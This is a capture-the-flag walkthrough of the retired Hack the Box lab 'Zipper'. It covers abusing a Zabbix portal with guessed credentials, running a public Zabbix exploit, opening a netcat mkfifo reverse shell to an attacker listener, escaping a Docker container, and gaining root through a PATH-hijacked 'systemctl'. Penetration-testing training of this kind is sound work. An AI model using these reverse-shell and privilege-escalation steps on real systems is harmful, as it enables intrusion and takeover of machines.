Today we are going to solve another CTF
challenge “Zipper”. It is a retired vulnerable lab presented by Hack the Box
for helping pentester’s to perform online penetration testing according to your
experience level; they have a collection of vulnerable labs as challenges, from
beginners to Expert level.
Level: Hard
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static
IP. The IP of Zipper is
· Surfing HTTPS service port (80)
· Directory enumeration using gobuster
· Logging in as a Guest User
· Enumerating for Login Credentials
· Logging in through zabbix-cli
· Giving permissions to access GUI
· Getting a reverse shell using zabbix exploit
· Retrieving User flag
· Modify the Environment PATH to run systemctl
· Snagging the Root Flag
Let’s start off with our basic Nmap command
to find out the open ports and services.
The Nmap scan shows us that there are 2
ports open: 22(SSH), 80(HTTP)
As port is 80 is running HTTP service, we
access the web service using the web browser.
Now we run gobuster to enumerate the
directories of the web service and find a directory called /zabbix.
-s ‘200,204,301,302,307,403,500’ -e -t 20 -u -w
We open the “zabbix” directory and find a
login page for Zabbix web portal.
Now we login as guest and are able to
access the dashboard.
Enumerating the web application, inside
“Latest data” in montoring data we get a hint for the username as “Zapper’s
Backup script”.
Now we try to login again as user “zapper”.
We try to login using the username and password the same i.e. “zapper: zapper”.
When we try to login, we get an error stating
the “GUI access disabled”.
As we do not have GUI access, we use
zabbix-cli to connect the zabbix api and we check the available users. Now we can
either create a user with GUI access or add an existing user to a group with
GUI. In this case, we first create a new group called hack with GUI access
Now add user “zapper” to the new group we
created and we remove the user “zapper” from the previous group called “No
access to the frontend”.
Now we are successfully able to access the
web portal as user “zapper”.
Searching for an exploit for Zabbix
application, we find an exploit here. It requires
username, password and hostid to run the exploit successfully. As we have
access to the dashboard, we can find the hostid of a container.
Now we edit the exploit according to the
target application.
We run the exploit and are able to get a
shell. Now to get a reverse shell we setup our listener using netcat and run
the bash one liner to get a reverse shell.
/tmp/f;mkfifo /tmp/f;cat/tmp/f|/bin/sh -i 2>&1|nc 1234 >
Now when we check our listener, we find
that we are successfully able to get a reverse shell. When we try to spawn a
TTY shell using python, we find that the system doesn’t contain either python
or python3. So we use start bash interactive shell.
-c “import pty;pty.spawn(‘/bin/bash’)”
Enumerating the system, we find that we are
inside a docker container. We are able to find any solution to escape the
container. If we take a look at the zabbix documentation page, we find there is
an option called “execute_on”. To execute inside container, we have to set this
option as “0” and to execute on server we have the to set this option as “1”.
We edit the exploit and add these options in our exploit to get reverse shell
of the server.
We now run the exploit and use bash one liner to get a
reverse shell.
/tmp/f;mkfifo /tmp/f;cat/tmp/f|/bin/sh -i 2>&1|nc 1234 >
We setup the listener and get a reverse
shell on the server.
We change the directory to “/home/zapper”
and find a file called “user.txt”. We try to open the file and find that we do
not have read permissions.
We now go to “utils” directory and find a
file called “”. We open the file called find the password for user
We switch user to zapper and use the
password we find inside the “” file. After we switch user, we again
try to open the “user.txt” file and find the first flag.
We also find a file called “zabbix-service”
with SUID bit set. We find that the program is executing “systemctl”, when we
check the program with strings.
Now we can modify the PATH environment
variable, so that the program can run our malicious “systemctl”. We create a
new systemctl file that executes /bin/bash and give it executable permission.
Then we change the PATH environment variable to the location in which our
malicious file is stored and run the application. As soon as we run the program
we get a root shell.
“/bin/bash” > systemctl
+x systemctl
Now we change to /root directory and find a
file called “root.txt”. We take a look at the content of the file and find our
final flag.
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